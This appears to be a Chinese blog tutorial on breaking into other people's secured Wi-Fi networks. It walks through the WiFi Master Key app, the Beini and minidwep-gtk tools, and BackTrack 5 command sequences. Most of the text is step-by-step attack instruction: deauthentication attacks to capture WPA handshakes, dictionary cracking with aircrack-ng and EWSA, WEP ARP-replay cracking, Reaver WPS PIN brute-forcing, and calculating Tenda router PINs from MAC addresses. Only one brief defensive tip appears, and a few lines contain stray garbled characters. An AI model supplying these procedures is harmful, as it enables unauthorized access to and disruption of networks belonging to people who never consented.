面对电脑搜索到的无线网络信号,你是否怦然心动?但看到一个个启用安全的无线网络
你是否又感到有一丝遗憾。本人作为一个心动遗憾的代表,充分发挥主观能动性,总算学有所成,终于能成功无线密码,这份成功的喜悦不敢独享
写下该篇教程,其中方法1和2大家可能都知道,重点在方法3和4.
1工具:
USB外置大功率网卡 BT5 bini奶瓶 笔记本电脑一台 安卓手机一部
还用到 跑包软件EWSA 及字典(字典可以自己制作)
2 方法1:
手机版万能钥匙
① 很简单的,只要在有热点的地方点击一键查询并允许它打开数据移动开关,在选择后面有钥匙图标的wifi热点
② 查看密码的方法是:
手机要root过,然后下载RE管理器,进入RE管理器,找文件夹data , 再找misc , 继续找wifi , 最后打开wap-supplicant.conf,我就看到之前连接过的wifi的密码了
如图:
安卓手机root后查看方法
① 电脑版万能钥匙
打开“wifi万能钥匙电脑版”程序,点击要破解的热点,当出现“含有钥匙”的图标时,表示可以使用wifi万能钥匙来破解。如图,点击“自动连接”就可以实现wifi万能钥匙成功破解的目。
当wifi万能钥匙成功破解热点密码时,任务栏右下角就会自动出现“无线网络连接成功”的图标,点击该图标,在打开的“无线网络连接”窗口中,右击要查看密码的无线连接项,从弹出的菜单中选择“属性”在点安全,选择“显示字符”就可以看到密码了
电脑查看方法
方法3 bini奶瓶破解
① 下载虚拟机及beini ISO
② 安装好虚拟机后新建Beini ISO
虚拟机界面
② 接着点击“Next”
下一步
③ 按browse选择你的beini iso存放的位置加载beini然后点击next进入
beini iso存放的位置加载beini然后点击next进入
④ 选择ubunt在点“Next”
选择ubunt在点“Next”
⑤ 接在点击“Next“
点击“Next“
⑥ 接在
点击“Finsh“
⑦ 启动Beini
启动Beini
⑧ 进入后插上USB大功率网卡后点击桌面上
找到奶瓶这个图标
⑨ 点击YES
点击YES
⑩ 进入监听模式 点击Wlan0走下一步
点击Wlan0后下一步
⑪ 破解
选择破解WPA/PA2还是WEP,在点击 “Scan” 搜索信号
⑫ 搜索信号
搜索信号
⑬ 点击选择一个无线信号,这里我们选择“SYP” 如果没有客户端 Clients lnformtion下面方框就是空白,有客户端就会显示客户端的MAC,现在我们选择的“SYP” 然后在选择一下我们要攻击的客户端后在点击下一步
⑭ Client MAC 是我们选择的客户端的,如果没有客户端这个地方是空的.我们现在在点击start抓包页面
点击start抓包页面
⑮ 选择系统自带的字典抓包破解 password.lst 点击OK等待密码了
点击OK等待密码
⑯ 点击Deauth进行攻击 用自带字典破解中 需耐心等待
破解中
⑰ 下图表示自带的字典没有找到密码,可导出握手包用WESA跑包(怎么跑包后面介绍)
方法4水滴破解(minidwep-gtk)
一: 打开拟机及beini ISO系统 如果按照方法3 安装beini ISO系统,那就不用在装了,直接打开系统进入水滴破解(minidwep-gtk),水滴破解(minidwep-gtk)和bini奶瓶破解在一个系统,没安装的按方法3前8步安装就行。
① 打开beini进入桌面,插上USB大功率网卡后点击桌面上 图标,出现对话点击OK
图标
② 点OK后会进入如下界面
点OK
进入如下界面
③ 选好网卡 后点击S 扫描 选择一个信号pin码或抓包 pin码就点击Reaver,抓包就点击L启动,在这我先讲Pin码
④ 下面解释下点击Reaver出现的对话框下的命令
我们先了解下PIN码。
PIN码分前4 和后4 ,先破前4只有最多一万个组合,破后4中的前3只有一千个组合,一共就是一万一千个密码组合。10的4次方加10的3次方等与11000个密码组合,当Reaver确定前4 PIN密码后其任务进度数值将直接跳跃至90.9%,也就是说只剩余一千个密码组合了。共11000个密码
在PIN的时候却总是很慢我们在PIN的时候有两个对话框可选参数:
1 Reaver参数的意思
参数1
参数2
⑤ 在PIN的过程呢中会出现PIN不动和重码严重现象,现将本人总结的跑拼之独技奉献给大家
一.对方路由没开WPS, 遇到这种情况,直接放弃PIN ,可以抓包破。
二.一般是信号差,换个好天线或找个好方位
三.信道干扰严重,半夜起来跑拼,没效果就放弃
四.需要等待重启,也可能是路由太弱,需要你施展绝技应对。
五.客户端在线,对方电脑开启了防火墙,无端时再弄
以上原因可修改水滴参数
A. PIN不动和重码严重
PIN不动和重码严重
当pin 码pin到90.9%时重码循环 可一改参数为– a – vv - s
在告诉各位一个好消息 当遇到腾达,network路由以C8:3A:35开头的MAC有效~,以及00B00C开头的MAC有效时可以算出PIN 码
1. 第一个就是腾达的!这样子的一般直接用算就能算出密码!
如
我们以这个C8:3A:35:41:10:88 为例,我们在初始PIN换算器输入这个C8:3A:35:41:10:88 ,点“换算PIN”
就能得到PIN了!(42640721)
2.腾达路由器PIN计算器使用的腾达路由前6位MAC地址是C83A35或者00B00C,打开系统自带的计算器,把计算器设置成科学型(在查看里设置),先选择十六进制,然后输入腾达路由器mac地址的后六位,再点十进制,出来的数就是腾达路由的前七位pin码,PIN的时候最后一位可以从0开始,到9才10码,就出来PIN码了。
如图:
然后我们把这个PIN(42640721)输入到QSS里面的第3项,就能直接上网了
下一步就行
就能成功上网了!
3算出PIN码还可以在Pin的时候加上 – P ×××××××(PIN码)可以PIN的进度一下子到90%,要不了多久密码出来了
破解中
等PIN结果
等PIN结果
以上是PIN吗码破解
二:在来讲抓包
1 打开beini进入桌面,插上USB大功率网卡后点击桌面上 图标,出现对话点击OK
2点OK后会进入如下界面
3选好网卡 后点击S 扫描 选择一个信号pin码或抓包 pin码就点击Reaver,抓包就点击L启动,在这我先讲抓包
3抓到握手包后提示是否要在字典搜索 点击OK搜下看能否出密码
4 点OK 搜索中。。。等待密码
5提示没搜索到密码,点击OK
6提示拷贝到硬盘点OK
7 继续OK
7接着OK存到media
8插上U盘 U盘里要有子典啊 字典可以下载 在点击D跑包
选择握手包路径
选择字典
跑包中》》》
密码就会出现如下图:
如果没找到密码就如下 点OK
提示你保存握手包到硬盘的分区点YES OK
记住握手包位置 等下要导出用EWSA跑包
提示保存好了
备注:保存好了以后不用去扫描,同时握手包还需要用软件ewsa跑包,在这里先不介绍,等把最后我知道的一种方法讲完在介绍
方法6 bt5破解
1 下载bt5 在虚拟机里安装(这里安装就不介绍了,刻盘或U盘都能可以,不会安装的请按照方法1就可以)
2打开bt5
BT5启动时需要用户名(root)和密码(toor)开始startx
3进入桌面后点击终端
4打开终端后 首先查看网络连接:
输入root@bt:~# ifconfig -a #查看所有连接
5激活无线网卡:
root@bt:~#ifconfig wlan0 up
6设置无线网卡为混杂模式
root@bt:~#airmon-ng start wlan0
7再次查看网络连接发现多了个mon0接口,以下就通过mon0开始破解无线网络
root@bt:~#ifconfig -a
8破解WPA网络
首先找到目标,看哪个网络容易破解,一般有客户端连接的路由器才比较容易破解
root@bt:~#airodump-ng mon0
9 wpa要找有客户端的通过接入点mac查看上面的扫描结果,选取合适的进行抓包抓包命令 可以再开一个shell,比较方便查看)
airodump-ng -c 6 --bssid C8:3A:35:19:42:B0 -w myap mon0
解释
-c 是信道这里选6 ,此项也可以不写,程序自动扫描
--bssid 是要PJ的ap的mac
-w 是如果抓到握手包,保存在此文件(myap),文件名可以随便取,自己记住就行
然后把这个窗口放旁边,再开一个shell
在有客户端连接的情况下,可以用deauh攻击让客户端下线,客户端一般都会自动连接,这时就可以抓到握手包了。
对客户端进行deauth攻击
root@bt:~#aireplay-ng -0 3 -a C8:3A:35:19:42:B0 -c E8:D4:E0:D0:60:9C mon0
参数说明:-0 攻击模式是deauth, -0 3 发送3次deauth攻击
-a AP的mac 地址
-c 客户端地址
攻击的时候同时抓包,抓包窗口会提示抓到握手包: WPA handshake:E0:05:C5:A7:BB:92
deauth攻击的目的已经达到,现在可以停止抓包了,开始破解WPA密码:
root@bt:~#aircrack-ng -w WPA.txt 20121025-01.cap
参数说明:-w 字典文件
选择有handshake的无线网络,开始破解
WPA.txt 是事先在网上下载好的无线WPA字典,包含一些常用的密码和生日密码等等
9破解WEP无线网络
WEP破解是100%能破解出来的,不管多复杂的密码,只要能够抓够足够的IVS
还是先查找目标网络:
root@bt:~#airodump-ng –encrypt WEP mon0 #只抓WEP加密的网络
找到目标网络之后开始抓包保存
root@bt:~#airodump-ng –ivs -w 20121025 -c 11 mon0
为了能快速收集IVS,在有客户端的情况下进行ARP REQUEST 攻击
root@bt:~#aireplay-ng -3 -b E0:05:C5:A7:BB:92 -h 98:0C:82:AC:1A:10 mon0
收到5000个以上IVS之后,就可以破解了,如果破解不成功再多收集IVS
root@bt:~#aircrack-ng –ivs 20121025*.ivs
破解成功!wep加密基本是100%破解成功,所以一般不要设置加密方式为WEP,不过不要以为wpa/wpa2加密就高枕无忧了,
WPA密码要设置尽量杂点,不要用纯数字,8~10位的纯数字密码一般的破解字典都有。
10 reaver穷举PIN
① 下载reaver-1.4.tar.gz(或未来更高版本)
安装reaver。
在联网情况下0 K! W' d# Z5 _" k8 Y9 Q _
1、首先安裝:Reaver相关库文件
打开终端命令窗口,依次执行:
$ sudo apt-get install libpcap-dev
$ sudo apt-get install libsqlite3-dev
下载Reaver 1.4:http://www.xxxxx.com (地址我也没有 这里只是做例子)
解压到桌面/reaver-1.4
在终端命令窗口中进入到reaver文件的目录:
$ cd桌面/reaver-1.4/src
$ ./configure #备注:(如果提示没有权限,可先执行chmod +x configure,然后再运行./configure或; sh ./configure)
8 i' A- P+ ], V6 b7 l7 N" T1 F+ T& ]; E, {: m; n" Z$ make
. y* I% M1 h+ H" ~$ sudo make install
如机器未安裝Aircrack-ng,运行下列命令下载安装:
$ sudo apt-get install aircrack-ng
在未联网情况下
1. 在Windows下下载Reaver 1.4
2. 使用Winrar或则7zip解压reaver-1.4.tar.gz文件,拷贝src文件夹到U盘
3回到Vbox,打开正在运行的BT5虚拟机,点击设备-->分配USB设备-->选中优盘
4.稍等片刻,优盘图标就出现在了Bt5桌面,双击打开优盘,右击src文件夹,点copy
右击BT5桌面空白处,点paste将src文件夹,拷贝到桌面上。
点上方Terminal图标,逐条运行以下指令:cd /root/Desktop/src
./configure备注:(如果提示没有权限,可先执行chmod +x configure,然后再运行./configure或; sh ./configure)
make
make install至此reaver安装完成
二.开始pin破解
打开shell窗口
1 输入:airmon-ng start wlan0 开启监听模式
2 输入:wash -i mon0 -C 查看所有开启WPS的无线路由 长时间无反应按Ctrl+C,结束进程,这时记下你要破解的目标路由MAC
3 输入:airodump-ng mon0 网卡以混杂模式扫描所有频道---并显示所有AP的信息(包括 AP的信号强度,ESSID,MAC,频道,加密方式,等等.....),按Ctrl+C,结束扫描.
注:如果你已知对方无线路由信息第2,第3步可省略!:
4 例如要破解‘kay’的网络,输入命令:reaver -i mon0 -b F4:EC:38:48:9F:BE -vv(两个v), 开始穷举pin码 知道PIN码可以在 –vv 后面加上-p xxxxx(pin码)
5.中间出现重复的time out,因为reaver可以自动保存进度,所以果断按Ctrl+C中断,然后重试
6.-vv参数可以显示更多信息,也可以加入-S参数。最后,成功破解
到此破解全部介绍完了,各位是否还记得前面提到的握手包,在这给各位讲下跑握手包
1 把抓到的握手包放到Windows .并下载EWSA
2打开EWSA
2导入握手包
- 配置EWSA ,1.选项 字典DIY 字典设置 密码变化选项 把勾选都去掉,2.选项 字典DIY 字典设置 导入我们自己的字典,(生日字典和8位纯数字字典)
点击开始测试,一般是生日字典的话,2分钟就能跑出密码,如是 8位纯数字的话,最多12小时,cpa或cpa2密码都可以跑出来的
好啦教程到此结束了
閱讀更多 小方美好生活 的文章
